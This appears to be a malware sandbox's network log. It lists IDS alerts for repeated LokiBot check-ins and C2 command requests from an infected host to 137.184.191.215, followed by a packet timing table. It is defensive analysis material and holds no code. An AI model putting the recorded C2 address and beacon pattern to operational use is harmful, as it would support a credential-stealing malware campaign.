                                        2024-10-02T07:19:27.707362+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59090 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:30.379725+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59090 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:30.379725+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59090 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:30.551427+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59091 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:30.551427+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59091 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:33.225029+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59091 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:33.225029+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59091 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:33.393218+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59092 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:33.393218+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59092 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:36.057069+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59092 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:36.057069+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59092 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:36.220072+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59093 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:36.220072+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59093 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:38.828485+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59093 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:38.828485+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59093 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:38.975579+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59094 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:38.975579+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59094 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:41.576277+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59094 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:41.576277+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59094 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:41.723886+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59095 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:41.723886+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59095 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:44.444483+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59095 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:44.444483+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59095 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:44.604525+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59096 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:44.604525+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59096 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:47.324761+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59096 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:47.324761+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59096 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:47.483919+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59097 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:47.483919+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59097 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:49.999462+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59097 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:49.999462+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59097 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:50.178821+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59098 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:50.178821+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59098 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:53.439974+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59098 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:53.439974+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59098 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:53.593930+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59099 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:53.593930+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59099 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:56.226080+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59099 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:56.226080+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59099 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:56.379219+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59100 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:56.379219+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59100 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:59.055098+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59100 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:59.055098+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59100 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:59.214834+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59101 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:19:59.214834+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59101 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:01.880033+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59101 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:01.880033+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59101 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:02.286811+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59102 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:02.286811+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59102 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:04.967633+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59102 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:04.967633+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59102 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:05.122471+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59103 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:05.122471+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59103 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:07.737466+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59103 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:07.737466+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59103 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:07.886272+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59104 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:07.886272+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59104 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:10.515443+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59104 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:10.515443+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59104 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:10.665251+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59105 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:10.665251+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59105 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:13.220159+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59105 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:13.220159+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59105 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:13.365954+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59106 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:13.365954+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59106 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:16.036940+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59106 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:16.036940+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59106 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:16.194835+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59107 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:16.194835+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59107 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:19.692535+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59107 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:19.692535+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59107 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:19.864465+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59108 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:19.864465+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59108 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:22.539182+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59108 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:22.539182+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59108 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:22.698157+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59109 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:22.698157+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59109 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:25.272631+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59109 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:25.272631+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59109 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:25.433688+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 59110 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:25.433688+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 59110 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:28.121264+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 59110 | 137.184.191.215 | 80 | TCP
                                        2024-10-02T07:20:28.121264+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 59110 | 137.184.191.215 | 80 | TCP
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Oct 2, 2024 07:18:30.077792883 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:30.732522011 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:30.732629061 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:30.735827923 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:30.735842943 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:30.736064911 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:30.736994982 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:30.779406071 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.739701033 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.739831924 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.745404005 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.745476007 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.758057117 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.758161068 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.758172035 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.764347076 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.764413118 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.764419079 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.808254957 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.829811096 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.830032110 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.830209970 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.830216885 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.834454060 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.834512949 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.834518909 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.839754105 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.839812994 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.839818001 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.844430923 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.844485998 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.844491005 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.847723007 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.847776890 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.847781897 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.854075909 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.854130983 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.854135990 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.860265017 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.860316992 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.860322952 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.866831064 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.866890907 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.866897106 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.872431993 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.872488976 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.872493982 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.878293037 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.878353119 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.878359079 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.884129047 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.884183884 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.884188890 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.897948980 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.898005962 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.898013115 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.920238018 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.920283079 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.920310020 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.920315981 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.920375109 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.920455933 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.925965071 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.926027060 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.926033020 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.930700064 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.930737972 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.930757999 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.930763960 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.930798054 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.930814981 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.930819035 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.930880070 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.930885077 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.935470104 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.935524940 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.935528994 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.936670065 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.936726093 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.936729908 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.941685915 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.941744089 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.941750050 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.946600914 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.946655989 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.946660995 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.951013088 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.951071024 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.951076031 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.955691099 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.955748081 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.955751896 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.960392952 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.960448980 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.960452080 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.964925051 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.964973927 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.964978933 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.969657898 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.969713926 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.969719887 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.974127054 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.974162102 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.974180937 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.974184990 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.974234104 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.978208065 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.978322029 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.978377104 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.978379965 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.982363939 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.982417107 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.982424021 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.986408949 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.986465931 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.986470938 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.990128994 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.990262032 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.990267992 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.994074106 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.994123936 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.994128942 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.997503042 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:33.997555971 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:33.997560978 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.001166105 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.001219034 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.001224041 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.010639906 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.010687113 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.010690928 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.010695934 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.010742903 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.010801077 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.011167049 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.011213064 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.011217117 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.012736082 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.012793064 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.012799025 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.014914989 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.014966965 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.014971972 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.016977072 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.017028093 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.017033100 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.019124031 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.019170046 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.019175053 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.021301031 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.021349907 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.021354914 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.023452044 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.023502111 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.023507118 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.025679111 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.025727034 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.025732994 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.027834892 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.027887106 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.027892113 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.029974937 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.030024052 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.030029058 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.032222986 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.032269955 CEST49732443192.168.2.4142.250.186.33
                                        Oct 2, 2024 07:18:34.032274008 CEST44349732142.250.186.33192.168.2.4
                                        Oct 2, 2024 07:18:34.034323931 CEST44349732142.250.186.33192.168.2.4
